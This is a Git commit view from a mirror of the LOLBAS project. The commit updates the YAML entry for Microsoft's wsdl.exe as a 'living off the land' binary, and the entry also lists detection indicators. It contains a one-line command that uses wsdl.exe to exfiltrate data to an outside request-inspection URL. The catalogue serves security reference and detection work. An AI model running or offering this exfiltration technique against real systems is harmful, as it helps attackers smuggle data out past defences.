public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-27 07:18:05 +01:00
Code Issues Projects Releases Wiki Activity

Update Wsdl.yml

Browse Source
This commit is contained in:
Wietze 2023-08-05 18:47:18 +01:00 committed by GitHub
parent 58aa8038aa
commit 5e44b04b41
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
yml/OtherMSBinaries/Wsdl.yml
View File

@ -1,22 +1,19 @@
--- ---
Name: wsdl.exe Name: wsdl.exe
Description: The Web Services Description Language(WSDL) is an XML-based interface description language that is used for describing the functionality offered by a web service. The acronym is also used for any specific WSDL description of a web service (also referred to as a WSDL file), which provides a machine-readable description of how the service can be called, what parameters it expects, and what data structures it returns. Therefore, its purpose is roughly similar to that of a type signature in a programming language. Description: .NET Frameworks WebService install and administration tool
Author: 'Ialle Teixeira' Author: Ialle Teixeira
Created: 2022-03-28 Created: 2022-03-28
Commands: Commands:
- Command: wsdl.exe /server https://requestinspector.com/insp/inspect/XXXXXXXXXXXXXXX - Command: wsdl.exe /server https://requestinspector.com/insp/inspect/XXXXXXXXXXXXXXX
Description: Upload file, credentials or data exfiltration in general Description: "Exfiltrate data via a HTTP web request's URL."
Usecase: Upload file Usecase: Exfiltrate data
Category: Upload Category: Upload
Privileges: User Privileges: User
MitreID: T1567 MitreID: T1567
OperatingSystem: Windows 10 OperatingSystem: Windows 10, Windows 11
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wsdl.exe - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wsdl.exe
Code_Sample:
- Code:
Detection: Detection:
- IOC: wsdl.exe storing data into alternate data streams.
- IOC: Preventing/Detecting wsdl.exe with non-RFC1918 addresses by Network IPS/IDS. - IOC: Preventing/Detecting wsdl.exe with non-RFC1918 addresses by Network IPS/IDS.
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching wsdl.exe file. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching wsdl.exe file.
- IOC: User Agent is "Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319.42000)" - IOC: User Agent is "Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319.42000)"
@ -27,4 +24,3 @@ Resources:
- Link: https://pt.stackoverflow.com/questions/29116/o-que-%C3%A9-wsdl-web-services-description-language - Link: https://pt.stackoverflow.com/questions/29116/o-que-%C3%A9-wsdl-web-services-description-language
Acknowledgement: Acknowledgement:
- Person: Ialle Teixeira - Person: Ialle Teixeira
Handle: 'in@isdebuggerpresent'